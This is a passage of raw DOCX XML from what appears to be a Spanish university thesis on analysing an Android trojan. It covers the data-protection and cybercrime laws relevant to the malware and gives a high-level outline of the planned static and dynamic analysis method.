        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27FCAF69" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="340"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="23E21175" w14:textId="7975D143" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00545DC1">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="52" w:name="_2.5__"/>
      <w:bookmarkStart w:id="53" w:name="_Toc107862696"/>
      <w:bookmarkEnd w:id="52"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:bookmarkStart w:id="54" w:name="_Toc170500165"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>LEGISLACIÓN Y NORMATIVA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="53"/>
      <w:bookmarkEnd w:id="54"/>
    </w:p>
    <w:p w14:paraId="5C137FC9" w14:textId="77777777" w:rsidR="009B7E42" w:rsidRDefault="009B7E42" w:rsidP="009B7E42">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="505A42AA" w14:textId="449EE36F" w:rsidR="009B7E42" w:rsidRDefault="00E51CED" w:rsidP="009B4B38">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En este apartado se hará una </w:t>
      </w:r>
      <w:r w:rsidR="00545DC1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>enumeración y r</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>evisión de las leyes y normas aplicables al proyecto a realizar. Se incluyen tanto aquellas de ámbito nacional como las que pertenezcan al ámbito europeo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75E7ED18" w14:textId="71673091" w:rsidR="004D657A" w:rsidRDefault="004D657A" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C729F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Reglamento General de Protección de Datos de la Unión Europea</w:t>
      </w:r>
      <w:r w:rsidR="00170A88">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>[X]: conocido también como RGPD, establece los parámetros a la hora de realizar el tratamiento de datos personales</w:t>
      </w:r>
      <w:r w:rsidR="007F79CD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de personas físicas y de su libre circulación. En este caso, como se verá más tarde durante el análisis, el malware realiza una recopilación indiscriminada de datos personales que se encuentran almacenados en el dispositivo infectado. Estas operaciones se realizan sin el conocimiento y autorización del usuario del dispositivo</w:t>
      </w:r>
      <w:r w:rsidR="004E0AB8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, y por supuesto también sin ninguna base legal para el tratamiento</w:t>
      </w:r>
      <w:r w:rsidR="007F79CD">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">. Asimismo, estos datos son posteriormente exfiltrados a servidores que aparentemente estarían ubicados en un país fuera de la Unión Europea, y que podrían pertenecer a la categoría de “Países terceros” </w:t>
      </w:r>
      <w:r w:rsidR="004E0AB8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>contemplada por el reglament</w:t>
      </w:r>
      <w:r w:rsidR="00CF2CAC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>o, lo cual estaría prohibido de no estar aplicadas las salvaguardas necesarias.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BD2CD2" w14:textId="1BD61F66" w:rsidR="004D657A" w:rsidRDefault="004D657A" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C729F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Ley Orgánica de Protección de Datos Personales y Garantía de los Derechos Digitales</w:t>
      </w:r>
      <w:r w:rsidR="00170A88">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> (</w:t>
      </w:r>
      <w:r w:rsidR="00170A88">
        <w:t>Ley Orgánica 3/2018) [X]</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>: conocida también como LOPD</w:t>
      </w:r>
      <w:r w:rsidR="008A7BA0">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>GDD</w:t>
      </w:r>
      <w:r w:rsidR="00170A88">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001072A4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>cuya función es</w:t>
      </w:r>
      <w:r w:rsidR="00170A88">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> la adaptación </w:t>
      </w:r>
      <w:r w:rsidR="001072A4">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>del marco legal español al RGPD dictado por la Unión Europea.</w:t>
      </w:r>
      <w:r w:rsidR="00482A18">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Nuevamente, el malware a analizar no cumple los requisitos que establece la ley a la hora de obtener y extraer del dispositivo infectado los datos de carácter personal.</w:t>
      </w:r>
      <w:r w:rsidR="005C774E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> Estos datos recopilados no se incluyen dentro de las naturalezas o índoles </w:t>
      </w:r>
      <w:r w:rsidR="005C774E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>que están exentas de base legitimadora</w:t>
      </w:r>
      <w:r w:rsidR="00071796">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y la aplicación</w:t>
      </w:r>
      <w:r w:rsidR="006F4E19">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> de tipo </w:t>
      </w:r>
      <w:r w:rsidR="00071796">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>troyano</w:t>
      </w:r>
      <w:r w:rsidR="00482A18">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="006F4E19">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">analizada </w:t>
      </w:r>
      <w:r w:rsidR="00071796">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>c</w:t>
      </w:r>
      <w:r w:rsidR="00482A18">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>arece de los permisos necesarios por parte de los usuarios</w:t>
      </w:r>
      <w:r w:rsidR="00071796">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00482A18">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidR="00274789">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tampoco</w:t>
      </w:r>
      <w:r w:rsidR="00482A18">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00071796">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">otorga a estos los derechos necesarios </w:t>
      </w:r>
      <w:r w:rsidR="005D373D">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>respecto a sus datos e</w:t>
      </w:r>
      <w:r w:rsidR="00071796">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>stablecidos por la ley.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15147AFC" w14:textId="38A0FFD1" w:rsidR="00C17D3B" w:rsidRDefault="00865CF9" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C729F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Convenio de Budapest</w:t>
      </w:r>
      <w:r w:rsidR="00C00332">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]: </w:t>
      </w:r>
      <w:r w:rsidR="009C2142">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>tratado a nivel europeo cuyo fin es combatir la ciberdelincuencia</w:t>
      </w:r>
      <w:r w:rsidR="00DA5D75">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> mediante entre otras medidas la colaboración entre diferentes instituciones pese a que estas pertenezcan a diferentes países</w:t>
      </w:r>
      <w:r w:rsidR="006F4E19">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, así como tratar de que sus respectivas leyes estén armonizadas en lo respectivo a los delitos informáticos. Este convenio recoge las acciones realizadas por el malware a analizar como </w:t>
      </w:r>
      <w:r w:rsidR="0027606E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>delictivas</w:t>
      </w:r>
      <w:r w:rsidR="00CE778E">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, ya que se trata de una utilización de los recursos del dispositivo infectado, junto con una recopilación y posterior extracción de datos de este que en ningún momento ha sido autorizada por el usuario y está siendo realizada de manera ilegal.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5851FCC5" w14:textId="262D1B49" w:rsidR="00865CF9" w:rsidRDefault="00865CF9" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C729F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Plan Nacional de Ciberseguridad</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y </w:t>
      </w:r>
      <w:r w:rsidRPr="00C729F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Real Decreto 311/2022</w:t>
      </w:r>
      <w:r w:rsidR="002D3FE8">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]</w:t>
      </w:r>
      <w:r w:rsidR="00752C02">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">: real decreto cuyo objetivo es la regulación del Esquema Nacional de Seguridad para determinar la política de seguridad en la utilización de los medios electrónicos y adaptarlo a la transformación digital de la sociedad. </w:t>
      </w:r>
      <w:r w:rsidR="002552B1">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En el caso de que el malware bajo análisis afectase </w:t>
      </w:r>
      <w:r w:rsidR="00EE0904">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>a dispositivos que formasen parte del sector privado</w:t>
      </w:r>
      <w:r w:rsidR="001463D7">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> y se produjese una brecha de datos</w:t>
      </w:r>
      <w:r w:rsidR="00EE0904">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">, se debería de seguir el procedimiento de notificación </w:t>
      </w:r>
      <w:r w:rsidR="009022B6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">establecido </w:t>
      </w:r>
      <w:r w:rsidR="00EE0904">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">y </w:t>
      </w:r>
      <w:r w:rsidR="009022B6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">mediante su presentación </w:t>
      </w:r>
      <w:r w:rsidR="00EE0904">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ante </w:t>
      </w:r>
      <w:r w:rsidR="009022B6">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">el organismo </w:t>
      </w:r>
      <w:r w:rsidR="00EE0904">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>INCIBE-CERT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E82662D" w14:textId="440E7A83" w:rsidR="005922C2" w:rsidRPr="009B7E42" w:rsidRDefault="005922C2" w:rsidP="009B4B38">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C729F7">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>INCIBE-CERT</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> [X]: </w:t>
      </w:r>
      <w:r w:rsidR="0002569A">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>organismo de respuesta a incidentes del Instituto Nacional de Ciberseguridad. Dentro de su Guía Nacional de Notificación y Gestión de Ciberincidentes [X]</w:t>
      </w:r>
      <w:r w:rsidR="00025FDC">
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> se establece un marco de referencia que ha sido consensuado entre los organismos nacionales competentes en el ámbito de la notificación y gestión de incidentes. Exige unos criterios mínimos y unas obligaciones de reporte para los casos de incidente recogidos por la ley. Dependiendo del tipo de incidente provocado por el malware bajo análisis, este caso podría producirse y por lo tanto, se deberían seguir la metodología establecida para llevar a cabo tanto la notificación del incidente como el seguimiento, todo ello mediante el sistema de ventanilla única. En función del tipo de afectado por el malware también se podrían aplicar requerimientos particulares por parte de las autoridades competentes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384EE511" w14:textId="5CD8F390" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00CE26B5">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="45B688DA" w14:textId="53C12538" w:rsidR="00E95A92" w:rsidRDefault="00FA7D97" w:rsidP="00E95A92">
      <w:pPr>
        <w:pStyle w:val="Standard"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="55" w:name="_Toc107862697"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:bookmarkStart w:id="56" w:name="_Toc170500166"/>
      <w:r w:rsidR="00E95A92">
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:hAnsi="Trebuchet MS"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="202020"/>
          <w:sz w:val="56"/>
          <w:szCs w:val="56"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Capítulo 3: Solución</w:t>
      </w:r>
      <w:bookmarkEnd w:id="55"/>
      <w:bookmarkEnd w:id="56"/>
    </w:p>
    <w:p w14:paraId="036B466C" w14:textId="77777777" w:rsidR="007D5820" w:rsidRDefault="007D5820" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06ACFE92" w14:textId="7BD7086D" w:rsidR="00E95A92" w:rsidRDefault="00CB6D13" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>A lo largo de este capítulo se presentará la solución al problema del proyecto. Se incluirá una descripción general sobre esta, además de detallar el proceso que se ha seguido para su obtención y los resultados finales obtenidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F50A5F" w14:textId="77777777" w:rsidR="00BB2246" w:rsidRDefault="00BB2246" w:rsidP="00E95A92">
      <w:pPr>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="35AEE5AE"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57" w:name="_3.1__"/>
      <w:bookmarkStart w:id="58" w:name="_Toc107862698"/>
      <w:bookmarkStart w:id="59" w:name="_Toc170500167"/>
      <w:bookmarkEnd w:id="57"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>3.1   DESCRIPCIÓN DE LA SOLUCIÓN</w:t>
      </w:r>
      <w:bookmarkEnd w:id="58"/>
      <w:bookmarkEnd w:id="59"/>
    </w:p>
    <w:p w14:paraId="11AE185C" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1615"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47595F60" w14:textId="4E1502BE" w:rsidR="000F0362" w:rsidRDefault="000F0362" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1615"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">Para comprender el funcionamiento del malware se deben realizar los análisis planificados. En la fase de análisis estático no se </w:t>
      </w:r>
      <w:r w:rsidR="00E8066B">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>ejecuta</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> el malware, si no que se </w:t>
      </w:r>
      <w:r w:rsidR="00E8066B">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">obtienen </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">en primer lugar marcas identificadoras del malware </w:t>
      </w:r>
      <w:r w:rsidR="00E8066B">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>y se realiza posteriormente</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> un análisis del código</w:t>
      </w:r>
      <w:r w:rsidR="00E8066B">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>de la aplicación</w:t>
      </w:r>
      <w:r w:rsidR="00E8066B">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>, bien sea en los archivos DEX presentes, o analizando el código Java o Kotlin disponible</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>. Es posible que se deba realizar una tarea de deofuscación previa en el caso de no encontrarse el código inicial en un estado legible, lo cual suele ser común en aplicaciones malware que tratan de esconder sus intenciones maliciosas de los analistas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024D7FC2" w14:textId="7C143DE2" w:rsidR="00E8066B" w:rsidRDefault="00E8066B" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1615"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">En la sección de análisis dinámico se </w:t>
      </w:r>
      <w:r w:rsidR="006D1A4F">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">ejecutará el malware utilizando el entorno controlado con dispositivos emulados mencionado en apartados anteriores. Se llevarán a cabo numerosas pruebas para tratar de cubrir los caminos de ejecución descubiertos durante el análisis estático. Además, en el caso de contar con servidores C&amp;C, se analizará la comunicación del troyano con estos mediante un sistema de proxy. Si por el contrario </w:t>
      </w:r>
      <w:r w:rsidR="00046655">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>los servidores externos</w:t>
      </w:r>
      <w:r w:rsidR="006D1A4F">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> no estuviesen accesibles o no respondiesen como se esperase, impidiendo por lo tanto la exploración de nuevos caminos de ejecución, se procedería a tratar de interceptar el</w:t>
      </w:r>
      <w:r w:rsidR="00046655">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve"> tráfico desde el dispositivo infectado y tratar de redirigirlo a un servidor local en el que se intentaría simular el servidor externo y con el cual se podría tratar de provocar comportamientos </w:t>
      </w:r>
      <w:r w:rsidR="001B0D09">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">del malware </w:t>
      </w:r>
      <w:r w:rsidR="00046655">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">determinados observados </w:t>
      </w:r>
      <w:r w:rsidR="00987EE3">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t xml:space="preserve">previamente </w:t>
      </w:r>
      <w:r w:rsidR="00046655">
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>en el análisis estático.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A41428" w14:textId="7D3203B1" w:rsidR="004941C6" w:rsidRDefault="004941C6" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1615"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:t>Una vez finalicen ambas fases, esto es, cuando se hayan recabado los datos necesarios para determinar los comportamientos y capacidades que posee el troyano, se procede a la comparación de resultados entre las dos fases, así como a la presentación de toda la información que se considere relevante en el posterior informe.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EE93439" w14:textId="77777777" w:rsidR="00E95A92" w:rsidRDefault="00E95A92" w:rsidP="00E95A92">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1615"/>
        </w:tabs>
        <w:spacing w:after="120" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="202020"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33854E64"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60" w:name="_Toc107862699"/>
      <w:bookmarkStart w:id="61" w:name="_Toc170500168"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Trebuchet MS" w:eastAsia="MS Mincho" w:hAnsi="Trebuchet MS" w:cs="Trebuchet MS"/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3.2   EL PROCESO DE DESARROLLO</w:t>
      </w:r>
      <w:bookmarkEnd w:id="60"/>
